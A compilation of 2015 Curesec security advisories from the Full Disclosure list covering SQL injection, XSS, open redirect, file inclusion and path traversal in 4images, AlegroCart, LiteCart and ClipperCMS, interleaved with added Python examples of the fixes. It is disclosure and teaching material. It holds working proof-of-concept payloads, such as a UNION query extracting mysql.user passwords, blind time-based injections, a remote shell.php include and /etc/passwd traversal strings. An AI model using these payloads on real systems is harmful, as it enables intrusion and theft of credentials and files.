11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Path-Traversal-106.html
 



[FD] 4images 1.7.11: SQL Injection

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:4images 1.7.11
Fixed in:1.7.12
Fixed Version Link:  http://www.4homepages.de/download-4images
Vendor Website:  http://www.4homepages.de/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When backing up the database, the user can supply the tables that should be
backed up. The program does not check if these tables actually belong to the
4images database or to a different database. Because of this, it is possible to
back up, and thus read, any database the database user has access to.

However, even if there were a check for the database, it would still be
possible to perform arbitrary SELECT statements by injecting into a SELECT
query that looks like this: "SELECT * FROM $table" where $table is user
supplied.

Admin credentials are required to back up the database.

3. Proof of Concept


POST /4images/admin/backup.php HTTP/1.1
__csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=mysql.user

POST /4images/admin/backup.php HTTP/1.1
__csrf=43c557c252fe6f57db4720b23771c7ab&action=makebackup&db_tables%5B%5D=4images_comments
 where comment_id=-1 union all select user,password,3,4,5,6,7,8 from mysql.user
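Added example (Python with SQLite, not 4images code): the makebackup table-name problem re-created against an in-memory database, next to a hardened version. The point it makes is that a table identifier cannot be bound as a query parameter the way a value can, so the defence is an allowlist taken from the application's own schema plus identifier quoting. Table names (images_ prefix, mysql_user) are constructed stand-ins; the real 4images_ prefix starts with a digit, which SQLite rejects unquoted while MySQL accepts it.

```python
import sqlite3
from typing import List, Set

# Constructed stand-in for the 4images table prefix (see lead-in).
TABLE_PREFIX = "images_"

def setup_db() -> sqlite3.Connection:
    """Constructed sample data: one application table plus a table standing
    in for mysql.user (SQLite has no cross-database names to reach into)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE images_comments(comment_id INTEGER, comment_text TEXT);
        INSERT INTO images_comments VALUES (1, 'nice picture');
        CREATE TABLE mysql_user(user TEXT, password TEXT);
        INSERT INTO mysql_user VALUES ('root', 'constructed-hash');
    """)
    return conn

def dump_table_vuln(conn: sqlite3.Connection, table: str) -> List[tuple]:
    """Mirrors 'SELECT * FROM $table' with the request value pasted in."""
    return conn.execute("SELECT * FROM " + table).fetchall()

def app_tables(conn: sqlite3.Connection) -> Set[str]:
    """Allowlist: the tables that actually belong to the application."""
    rows = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name LIKE ?",
        (TABLE_PREFIX + "%",),
    )
    return {r[0] for r in rows}

def quote_ident(name: str) -> str:
    """Identifiers cannot be bound as parameters, so quote them instead
    (SQL-standard double quotes; MySQL would use backticks)."""
    return '"' + name.replace('"', '""') + '"'

def dump_table_fixed(conn: sqlite3.Connection, table: str) -> List[tuple]:
    if table not in app_tables(conn):
        raise ValueError("not an application table: %r" % table)
    return conn.execute("SELECT * FROM " + quote_ident(table)).fetchall()

def rejected(conn: sqlite3.Connection, table: str) -> bool:
    """True if the hardened version refuses `table`."""
    try:
        dump_table_fixed(conn, table)
    except ValueError:
        return True
    return False

# The two payload shapes from the proof of concept, adapted to SQLite names.
FOREIGN_TABLE = "mysql_user"
UNION_PAYLOAD = ("images_comments where comment_id=-1 "
                 "union all select user,password from mysql_user")
```

Both payloads return the foreign table's rows through dump_table_vuln() and are refused by dump_table_fixed(); a check that only verified the table exists somewhere on the server would still let the first one through.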

4. Solution

To mitigate this issue please upgrade at least to version 1.7.12:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-SQL-Injection-108.html
 



[FD] 4images 1.7.12: XSS

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:4images 1.7.12
Fixed in:1.7.13 (update)
Fixed Version Link:  http://www.4homepages.de/download-4images
Vendor Website:  http://www.4homepages.de/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Overview

There are two reflected XSS vulnerabilities in 4images, as well as a persistent
Open Redirect, which may also lead to XSS in older browsers.

This allows an attacker to execute arbitrary JavaScript in the context of the
browser of a victim if the victim clicks on an attacker supplied link or visits
an attacker controlled website. With this, it is possible to bypass CSRF
protection and thus do anything the victim can do, inject a JavaScript
keylogger, or perform phishing attacks.

It should be noted that the XSS vulnerability still existed in another form in
the first release of version 1.7.13 and has been fixed with an update to that
version.

3. Reflected XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

When displaying the form to add new images, $_SERVER['PHP_SELF'] is echoed
unencoded inside a select tag. Because of this, additional attributes can be
added and new HTML tags can be created, leading to XSS.

Proof of Concept

Prior to Version 1.7.12:


http://localhost/4images/admin/images.php/"; onfocus=alert(1) autofocus 
foo="?action=addimages

Version 1.7.13 (before update):


http://localhost/4images/admin/images.php/');alert(1);window.location=('?action=addimages

This required a click of the victim to trigger, and a redirect will be
performed after the execution of the injected code.

Code


/admin/images.php
show_num_select_row(" ", "num_newimages", 
$lang['num_addnewimages_desc']);

/admin/admin_functions.php
function show_num_select_row($title, $option, $desc = "") {
  global $site_sess, $PHP_SELF, $action, $$option;
  echo "\n".$title."\n";
  echo "".$desc;
  $url = $PHP_SELF;
  $url .= preg_match("/\?/", $url) ? "&" : "?";
  $url .= "action=".$action;
  $url = $site_sess->url($url);
  echo "url($goto);
  }
  else {
$framesrc = $site_sess->url("home.php");
  }
?>

  
 Control Panel

  
  
" name="head" scrolling="NO" NORESIZE frameborder="0" marginwidth="0" 
marginheight="0" border="no">

  " name="nav" scrolling="auto" NORESIZE frameborder="0" marginwidth="0" 
marginheight="0" border="no">
  

  


5. Persistent Open Redirect

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

When showing an uploaded image, the description and keyword are not properly
encoded. Tags are removed, but it is still possible to add further attributes
to the meta tag they are inserted into.

This makes it possible to inject a redirect. This redirect will be persistent,
meaning anyone visiting the site of the uploaded image will be redirected to an
attacker controlled website.

The attacker needs the rights to upload images to perform the attack, which
means that a category needs to exist where anyone can upload images, or a
category needs to exist where registered users can upload images and the
registration must be open - which it is by default.

Proof of Concept

Upload an image, as description or keyword use:

Version 1.7.11 and earlier:
5;URL=http://google.com/"; http-equiv="refresh" foo="
Version 1.7.12:
5;URL=http://google.com/"; http-equiv=refresh foo="

When visiting the page of the uploaded image, a redirect will be performed.

With older browsers, it will be possible to inject and execute javascript as
well.

Code


details.php
$meta_keywords  = !empty($image_row['image_keywords']) ? 
strip_tags(implode(", ", explode(",", $image_row['image_keywords']))) : "";
$meta_description = !empty($image_row['image_description']) ? 
strip_tags($image_row['image_description']) . ". " : "";

$site_template->register_vars(array(
"detail_meta_description"   => $meta_description,
"detail_meta_keywords"  => $meta_keywords,
"prepend_head_title"=> $image_name . " - ",
));
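Added example (Python, not 4images code) of why strip_tags() is the wrong tool here. The value ends up inside an attribute, where a bare double quote closes the attribute and the payload adds http-equiv="refresh"; encoding for the attribute context stops that while leaving the tag stripping in place. The regex stand-in for strip_tags and the meta template are constructed; the standard-library HTML parser is used to show which attributes a browser would see.

```python
import html
import re
from html.parser import HTMLParser
from typing import Dict, Optional

TAG_RE = re.compile(r"<[^>]*>")          # rough stand-in for PHP strip_tags()

def render_meta_vuln(description: str) -> str:
    """details.php behaviour: tags stripped, then the value is placed inside
    an attribute with its quotes intact."""
    return '<meta name="description" content="%s">' % TAG_RE.sub("", description)

def render_meta_fixed(description: str) -> str:
    """Encode for the context the value lands in: a double-quoted attribute,
    so '"' must become &quot; (html.escape does that with quote=True)."""
    safe = html.escape(TAG_RE.sub("", description), quote=True)
    return '<meta name="description" content="%s">' % safe

class _MetaSniffer(HTMLParser):
    """Collects the attributes of the <meta> tag as a parser sees them."""
    def __init__(self) -> None:
        super().__init__()
        self.attrs: Dict[str, Optional[str]] = {}

    def handle_starttag(self, tag, attrs):
        if tag == "meta":
            self.attrs = dict(attrs)

def meta_attrs(fragment: str) -> Dict[str, Optional[str]]:
    p = _MetaSniffer()
    p.feed(fragment)
    p.close()
    return p.attrs

def redirects(fragment: str) -> bool:
    """True if the <meta> carries http-equiv="refresh", i.e. the page redirects."""
    return (meta_attrs(fragment).get("http-equiv") or "").lower() == "refresh"

# The advisory's 1.7.11 payload: closes the content attribute, adds
# http-equiv="refresh", and opens a dummy attribute that swallows the
# template's own closing quote.
PAYLOAD_1711 = '5;URL=http://google.com/"; http-equiv="refresh" foo="'
```

With the vulnerable renderer the parser reports an http-equiv attribute and a truncated content value; with the fixed renderer the whole payload survives as the content text and no new attribute appears.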

6. Solution

To mitigate this issue please upgrade at least to version 1.7.13:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

7. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases new version (1.7.12), partially fixing issues
11/17/2015 CVE Requested (no reply)
11/18/2015 Vendor releases new ve

Re: [FD] LiteCart 1.3.2: Multiple XSS

2015-11-24 Thread Curesec Research Team (CRT)
Hi,

These vulnerabilities are similar, as both of them are issues with the
query parameter of the search.

However, the issue in version 1.1.2.1 exploits this line:

  



This issue was fixed in version 1.2 by passing the query parameter to
htmlspecialchars before passing it to sprintf.

The issue in version 1.3.2 is that the query parameter is also echoed
unencoded inside the title tag, which is why the POC contains .

Best
Curesec Research Team

Am 11/18/2015 um 6:50 PM schrieb Henri Salo:
> On Fri, Nov 13, 2015 at 05:07:01PM +0100, Curesec Research Team (CRT) wrote:
>> 2. XSS 1
>> http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1)
>> 5. Solution
>> To mitigate this issue please upgrade at least to version 1.3.3:
> 
> This seems to be the same vulnerability as CVE-2014-7183[1] found by
> Netsparker[2]. CVE-2014-7183 was fixed in version 1.2 according to the
> changelog.
> 
> 1: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7183
> 2: https://www.netsparker.com/xss-vulnerabilities-in-litecart/
> 
> 



[FD] AlegroCart 1.2.8: SQL Injection

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:AlegroCart 1.2.8
Fixed in:Patch AC128_fix_17102015
Patch Link:  http://forum.alegrocart.com/download/file.php?id=1040
Vendor Website:  http://alegrocart.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

There is a blind SQL injection in the admin area of AlegroCart. Additionally,
there is a blind SQL injection when a customer purchases a product. Because of
a required interaction with PayPal, this injection is hard to exploit for an
attacker.

3. Blind SQL Injection (Admin)

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

When viewing the list of uploaded files (or images), the function
check_download is called. This function performs a database query with the
unsanitized name of the file. Because of this, an attacker can upload a file
containing SQL code in its name, which will be executed once files are listed.

Note that a similar function - check_filename - is called when deleting a file,
making it likely that this operation is vulnerable as well.

Admin credentials are required to exploit this issue.

Proof of Concept


POST 
/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert 
HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; 
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; 
currency=CAD; catalog_language=en; __atuvc=4%7C37
Connection: keep-alive
Content-Type: multipart/form-data; 
boundary=---16690383031191084421650661794
Content-Length: 865

-16690383031191084421650661794
Content-Disposition: form-data; name="language[1][name]"

test
-16690383031191084421650661794
Content-Disposition: form-data; name="download"; filename="image.jpg' AND 
IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(1,ENCODE('MSG','by 5 
seconds')),null) -- -"
Content-Type: image/jpeg

img

-16690383031191084421650661794
Content-Disposition: form-data; name="mask"

11953405959037.jpg
-16690383031191084421650661794
Content-Disposition: form-data; name="remaining"

1
-16690383031191084421650661794
Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4"

f396df6c76265de943be163e9b65878a
-16690383031191084421650661794--


Visiting
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download
will trigger the injected code.

Code


/upload/admin2/model/products/model_admin_download.php
function check_download($filename){
$result = $this->database->getRow("select * from download where 
filename = '".$filename."'");
return $result;
}

function check_filename($filename){
$results = $this->database->getRows("select filename from download 
where filename = '" . $filename . "'");
return $results;
}

/upload/admin2/controller/download.php
function checkFiles() {
$files=glob(DIR_DOWNLOAD.'*.*');
if (!$files) { return; }
foreach ($files as $file) {
$pattern='/\.('.implode('|',$this->prohibited_types).')$/';
$filename=basename($file);
if (!preg_match($pattern,$file) && 
$this->validate->strlen($filename,1,128)) {
$result = 
$this->modelDownload->check_download($filename);
if (!$result) { $this->init($filename); }
}
}
}
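Added example (Python with SQLite, not AlegroCart code) re-creating checkFiles() and check_download() above. It shows the second-order nature of the bug: the hostile value is a file name on disk, not a request parameter, and detonates later when an admin lists uploads. The same bound-parameter fix applies to check_filename(). Table layout, directory and file names are constructed for the example.

```python
import glob
import os
import sqlite3
import tempfile
from typing import Callable, List, Optional

def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the AlegroCart 'download' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE download(filename TEXT, mask TEXT)")
    conn.execute("INSERT INTO download VALUES ('11953405959037.jpg', 'image.jpg')")
    return conn

def make_upload_dir(names: List[str]) -> str:
    """Constructed DIR_DOWNLOAD holding the given (possibly hostile) file names."""
    d = tempfile.mkdtemp(prefix="alegro_dl_")
    for n in names:
        open(os.path.join(d, n), "wb").close()
    return d

def check_download_vuln(conn, filename: str) -> Optional[tuple]:
    """Port of check_download(): the name is concatenated into the SQL."""
    sql = "select * from download where filename = '" + filename + "'"
    return conn.execute(sql).fetchone()

def check_download_fixed(conn, filename: str) -> Optional[tuple]:
    """Same query with a bound parameter; a quote in the name is just data."""
    sql = "select * from download where filename = ?"
    return conn.execute(sql, (filename,)).fetchone()

def check_files(conn, upload_dir: str, check: Callable) -> List[str]:
    """Port of checkFiles(): register every file on disk the DB does not know.
    Returns the names that were treated as new, in sorted order."""
    registered = []
    for path in sorted(glob.glob(os.path.join(upload_dir, "*.*"))):
        name = os.path.basename(path)
        if 1 <= len(name) <= 128 and not check(conn, name):
            conn.execute("insert into download(filename, mask) values (?, ?)",
                         (name, name))
            registered.append(name)
    return registered

# A file name an uploader can choose. The concatenated query becomes
#   ... where filename = 'image.jpg' OR 1=1 -- -'
# which matches the first row, so the hostile file is never registered; the
# BENCHMARK() variant from the advisory instead stalls the admin's page.
HOSTILE_NAME = "image.jpg' OR 1=1 -- -"
```

Listing the directory with the vulnerable check registers only new.jpg, because the hostile name is "already known" to a query it has rewritten; with the parameterised check both files are registered and the quote never reaches the SQL grammar.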

4. Blind SQL Injection (Customer)

CVSS

Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description

There is an SQL Injection when using Paypal as a payment method during
checkout.

Please note that this injection requires that a successful interaction with
Paypal took place. For test purposes, we commented out the parts of the code
that actually perform this interaction with Paypal.

Proof of Concept


1. Register a User
2. Buy an item, using PayPal as payment method; stop at step "Checkout 
Confirmation"
3. Visit this link to trigger the injection: 
http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION.
 Note that this requires a valid paypal tx token.

The injection can be exploited blind:


http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1'
 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5 
seconds')),null) %23)

However, this is rather impractical, especially considering the need for a
valid PayPal token for each request.

It is also possible 

[FD] AlegroCart 1.2.8: LFI/RFI

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:AlegroCart 1.2.8
Fixed in:Patch AC128_fix_22102015
Patch Link:  http://forum.alegrocart.com/download/file.php?id=1047
Vendor Website:  http://alegrocart.com/
Vulnerability Type:  LFI/RFI
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When retrieving logs, there are no checks on the given file_path parameter.
Because of this, local or remote files can be included, which are then executed
or printed.

Admin credentials are required to view logs.

3. Proof of Concept

Remote File:


POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; 
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; 
currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; 
boundary=---16809437203643590021165278222
Content-Length: 441

-16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

http://localhost/shell.php
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-16809437203643590021165278222--

Local File:


POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: alegro=accept; admin_language=en; 
alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; 
currency=CAD; catalog_language=en
Connection: keep-alive
Content-Type: multipart/form-data; 
boundary=---16809437203643590021165278222
Content-Length: 425

-16809437203643590021165278222
Content-Disposition: form-data; name="directory"

error_log
-16809437203643590021165278222
Content-Disposition: form-data; name="file_path"

/etc/passwd
-16809437203643590021165278222
Content-Disposition: form-data; name="decrytion"

0
-16809437203643590021165278222--

For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack
strings were still working:


http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/

/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd

4. Code


/upload/admin2/controller/report_logs.php
function get_file(){
$file = '';
if($this->request->gethtml('file_path', 'post')){
$file = file_get_contents($this->request->gethtml('file_path', 
'post'));
}
if($this->request->gethtml('decrytion', 'post')){
$file = $this->ccvalidation->deCrypt($file, 
$this->config->get('config_token'));
}
if($file){
$file = str_replace(array("\r\n", "\r", "\n"),'', $file);
}
return $file;
}

5. Solution

To mitigate this issue please apply patch AC128_fix_22102015:

http://forum.alegrocart.com/download/file.php?id=1047

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
11/03/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html



[FD] LiteCart 1.3.2: Multiple XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:LiteCart 1.3.2
Fixed in:1.3.3
Fixed Version Link:  https://www.litecart.net/downloading?version=1.3.3.1
Vendor Contact:  developm...@litecart.net
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/07/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. XSS 1

Description

The query parameter of the search is vulnerable to XSS.

Proof of Concept


http://localhost/ecommerce/litecart-1.3.2/public_html/en/search?query=";>alert(1)

Code


public_html/pages/search.inc.php
document::$snippets['title'][] = empty($_GET['query']) ? 
language::translate('title_search_results', 'Search Results') : 
sprintf(language::translate('title_search_results_for_s', 'Search Results for 
"%s"'), $_GET['query']);

3. XSS 2

Description

The value of the GET parameter slide_id is passed to trigger_error if it is an
invalid id. trigger_error does not encode input, and as LiteCart shows errors
by default, this leads to an XSS vulnerability.

Proof of Concept


http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=slides&doc=edit_slide&page=1&slide_id=alert(1)

Code


includes/controllers/ctrl_slide.inc.php
if (empty($this->data)) trigger_error('Could not find slide ('. 
$slide_id .') in database.', E_USER_ERROR);

4. XSS 3

Description

The value of the GET parameter doc is passed to trigger_error if it is invalid.
trigger_error does not encode input, and as LiteCart shows errors by default,
this leads to an XSS vulnerability. Additionally, the accessing of non-existing
array values leads to a notice, which contains the index unsanitized. Because
of this, $app_config['docs'][$_GET['doc']] can also lead to XSS.

Proof of Concept


http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=appearance&doc=alert(1)

Code


admin/index.php
if (!empty($_GET['doc'])) {
  if (empty($app_config['docs'][$_GET['doc']]) || 
!file_exists(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' . 
$app_config['docs'][$_GET['doc']])) trigger_error($_GET['app'] .'.app/'. 
$_GET['doc'] . ' is not a valid admin document', E_USER_ERROR);
  include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . 
$_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']]);
} else {
  include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . 
$_GET['app'].'.app/' . $app_config['docs'][$app_config['default']]);
}

5. Solution

To mitigate this issue please upgrade at least to version 1.3.3:

https://www.litecart.net/downloading?version=1.3.3.1

Please note that a newer version might already be available.

6. Report Timeline

09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/LiteCart-132-Multiple-XSS-72.html



[FD] ClipperCMS 1.3.0: XSS

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.clippercms.com/
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Overview

There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require
specific non-default settings, others do not.

3. XSS 1

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Proof of Concept


http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar

4. XSS 2

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

The name, email, message, and subjected parameter of the Contact form are
vulnerable to XSS.

Unlike the XSS issues in the admin area described below, these work without
clickjacking or specific settings regarding referers.

Proof of Concept


The POCs for name and subjected are equivalent to this POC for email:


  
http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; 
method="POST">
  
  
  
  
  
  
  

  



POC for message:


  
http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6"; 
method="POST">
  
  
  
  alert(1)" />
  
  
  

  

5. XSS 3

CVSS

Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

The search field of the System Events page is vulnerable to XSS. To execute the
provided POC, the setting "Validate HTTP_REFERER headers" should be set to
false. Please note that it is likely possible to exploit this issue via
ClickJacking even if that setting is set to true.

Proof of Concept



  
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114"; 
method="POST">
  
  
  
  
  

  


6. XSS 4ff

CVSS

Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N

Description

Multiple parameters of various components of the admin area are vulnerable to
XSS.

To execute these POC, the setting "Validate HTTP_REFERER headers" should be set
to false.

Proof of Concept


http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function
 foo(){doRefresh(

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var
 bar='

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88";>&id=1

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode=";>&op=&search=test

http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1";>

7. Solution

This issue has not been fixed by the vendor.

8. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-XSS-101.html



[FD] ClipperCMS 1.3.0: Path Traversal

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.clippercms.com/
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

The "file" parameter of the file browser is vulnerable to directory traversal,
allowing the download of arbitrary files.

A user account is needed with at least the lowest default role, which is
"Editor".

3. Proof of Concept


POST 
/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download
 HTTP/1.1

dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

4. Code


/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php
protected function act_download() {
$dir = $this->postDir();
if (!isset($this->post['dir']) ||
!isset($this->post['file']) ||
(false === ($file = "$dir/{$this->post['file']}")) ||
!file_exists($file) || !is_readable($file)
)
$this->errorMsg("Unknown error.");

header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . str_replace('"', 
"_", $this->post['file']) . '"');
header("Content-Transfer-Encoding:­ binary");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}
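Added example (Python, not AlegroCart or ClipperCMS code): one containment check that addresses both the report_logs.php file_path include from the AlegroCart LFI/RFI advisory above and the kcfinder act_download() traversal here. The two AlegroCart interim patches that still let /var/www/.../logs/error_log/../../../../../../../etc/passwd through illustrate the failure mode, a prefix test on the unresolved string. Directory and file names are constructed.

```python
import os
import tempfile
from typing import Optional
from urllib.parse import urlsplit

def resolve_inside(base_dir: str, user_path: str) -> Optional[str]:
    """Return the resolved path of `user_path` if, after '..' and symlink
    resolution, it lies inside `base_dir`; otherwise None. URL schemes
    (the RFI half of the AlegroCart issue) and NUL bytes are refused."""
    if urlsplit(user_path).scheme:            # http://, php://, data:, ...
        return None
    if "\x00" in user_path:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    # Compare RESOLVED paths with a path-aware function. A startswith() on
    # the raw string is what the interim patches amounted to: the traversal
    # string has the right prefix and still leaves the directory. commonpath()
    # also keeps '/var/www/logs_evil' from passing for base '/var/www/logs'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate

def kcfinder_download_path(base_dir: str, sub_dir: str, file: str) -> Optional[str]:
    """kcfinder-style: a 'dir' and a 'file' parameter. Both are untrusted, so
    the check is applied to their combination, not to the parts."""
    return resolve_inside(base_dir, os.path.join(sub_dir, file))

def make_log_dir() -> str:
    """Constructed stand-in for AlegroCart's upload/logs directory."""
    d = tempfile.mkdtemp(prefix="logs_")
    with open(os.path.join(d, "error_log"), "w") as fh:
        fh.write("constructed log line\n")
    os.mkdir(os.path.join(d, "images"))
    return d

def inside(base_dir: str, *parts: str) -> str:
    """Expected-value helper: the resolved base joined with trusted parts."""
    return os.path.join(os.path.realpath(base_dir), *parts)
```

resolve_inside() accepts error_log and images/photo.jpg, and rejects the remote URL, the absolute /etc/passwd, the relative ../ chain, the absolute path that carries the right prefix but climbs out through .., and a sibling directory whose name merely starts with the base.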

5. Solution

This issue has not been fixed by the vendor.

6. Report Timeline

10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public


Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html


[FD] ClipperCMS 1.3.0: SQL Injection

2015-11-14 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Website:  http://www.clippercms.com/
Vulnerability Type:  SQL Injection
Remote Exploitable:  Yes
